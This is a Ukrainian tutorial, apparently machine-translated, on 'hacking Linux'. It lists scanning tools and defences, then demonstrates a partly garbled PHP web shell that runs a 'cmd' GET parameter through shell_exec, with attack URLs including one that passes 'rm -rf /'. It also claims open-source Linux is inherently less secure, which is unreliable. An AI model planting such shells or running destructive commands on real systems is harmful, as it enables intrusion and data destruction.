Linux - це найбільш широко використовувана серверна операційна система, особливо для веб-серверів. Це відкритий код; це означає, що кожен може мати доступ до вихідного коду. Це робить його менш безпечним у порівнянні з іншими операційними системами, оскільки зловмисники можуть вивчати вихідний код для пошуку вразливостей . Linux for Hackers - це використання цих уразливостей для отримання несанкціонованого доступу до системи.
У цій статті ми познайомимо вас із тим, що таке Linux, його вразливими місцями у безпеці, хакерством за допомогою Ubuntu та зустрічними заходами, які ви можете застосувати.
Теми, висвітлені в цьому посібнику
- Коротка примітка про Linux
- Інструменти злому Linux
- Як запобігти злому Linux
- Діяльність злому: зламати систему Linux за допомогою PHP
Коротка примітка про Linux
Linux - це операційна система з відкритим кодом . Існує багато дистрибутивів операційних систем на базі Linux, таких як Redhat, Fedora, Ubuntu і т. Д. На відміну від інших операційних систем, Linux менш безпечний, коли справа стосується безпеки. Це пов’язано з тим, що вихідний код доступний у вільному доступі, тому його легко вивчити на предмет уразливостей та використати їх порівняно з іншими операційними системами, які не є відкритими. Linux можна використовувати як операційну систему сервера, настільного ПК, планшета або мобільного пристрою.
Програмами Linux можна керувати за допомогою графічного інтерфейсу користувача або команд. Команди Linux для злому Kali Linux ефективніші та ефективніші порівняно з використанням графічного інтерфейсу. З цієї причини корисно знати основні команди Linux для злому.
Зверніться до цих посібників https://www.guru99.com/unix-linux-tutorial.html про те, як розпочати роботу з хакі Kali Linux.
Інструменти злому Linux
- Nessus - цей інструмент можна використовувати для злому Ubuntu, сканування налаштувань конфігурації, виправлень та мереж тощо. Його можна знайти за адресою https://www.tenable.com/products/nessus
- NMap. Цей інструмент можна використовувати для моніторингу хостів, що працюють на сервері, та служб, якими вони користуються. Також його можна використовувати для сканування портів. Її можна знайти за адресою https://nmap.org/
- SARA - SARA - абревіатура наукового співробітника аудитора безпеки. Як випливає з назви, цей інструмент може бути використаний для аудиту мереж проти таких загроз, як SQL Injection, XSS тощо. Його можна знайти за адресою http://www-arc.com/sara/sara.html
Наведений перелік не є вичерпним; це дає вам уявлення про інструменти, доступні для злому та злому систем Linux Ubuntu.
Як запобігти злому Linux
Злом Linux використовує переваги вразливостей операційної системи. Організація може застосувати таку політику, щоб захиститися від таких атак.
- Управління виправленнями - виправлення помилок, які зловмисники використовують для компрометації системи. Правильна політика управління виправленнями гарантуватиме, що ви постійно застосовуєте відповідні виправлення до своєї системи.
- Правильна конфігурація ОС - інші експерименти використовують слабкі місця в конфігурації сервера. Неактивні імена користувачів та демони слід вимкнути. Параметри за замовчуванням, такі як загальні паролі до програми, імена користувачів за замовчуванням та деякі номери портів, слід змінити.
- Система виявлення вторгнень - такі інструменти можна використовувати для виявлення несанкціонованого доступу до системи. Деякі інструменти мають можливість виявляти та запобігати таким атакам.
Діяльність злому: зламати систему Ubuntu Linux за допомогою PHP
У цьому практичному сценарії ми дізнаємося, як зламати Ubuntu, і надамо вам основну інформацію про те, як ви можете використовувати PHP для компрометації Linux. Ми не збираємося націлювати жодної жертви. Якщо ви хочете спробувати, ви можете встановити LAMPP на локальній машині.
PHP має дві функції, які можна використовувати для виконання команд злому Linux. Він має функції exec () та shell_exec (). Функція exec () повертає останній рядок виводу команди, тоді як shell_exec () повертає весь результат команди у вигляді рядка.
Для демонстраційних цілей припустимо, що менеджери зловмисників завантажують такий файл на веб-сервер.
$cmd";$output = shell_exec($cmd);echo "$output";?>
ТУТ,
Наведений вище сценарій отримує команду від змінної GET з іменем cmd. Команда виконується за допомогою shell_exec () і результати повертаються в браузер.
Наведений вище код можна використати, використовуючи наступну URL-адресу
http: //localhost/cp/konsole.php? cmd = ls% 20-l
ТУТ,
- “… Konsole.php? Cmd = ls% 20-l” призначає значення ls -l змінній cmd .
Команда в Ubuntu для злому сервера буде виконана як
shell_exec('ls -l') ;
Виконання вищевказаного коду на веб-сервері дає результати, подібні до наведених нижче.
Вищенаведена команда просто відображає файли в поточному каталозі та дозволи
Припустимо, зловмисник передає таку команду
rm -rf /
ТУТ,
- “Rm” видаляє файли
- “Rf” змушує команду rm працювати в рекурсивному режимі. Видалення всіх папок і файлів
- “/” Вказує команді розпочати видалення файлів з кореневого каталогу
URL-адреса атаки буде виглядати приблизно так
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Резюме
- Linux - це популярна операційна система для серверів, настільних ПК, планшетів та мобільних пристроїв.
- Linux є відкритим кодом, і вихідний код може отримати кожен. Це дозволяє легко виявити вразливі місця. Це одна з найкращих ОС для хакерів.
- Основні та мережеві команди злому в Ubuntu цінні для хакерів Linux.
- Вразливості - це слабкість, яку можна використати для компрометації системи.
- Хороший захист може допомогти захистити систему від злому зловмисником.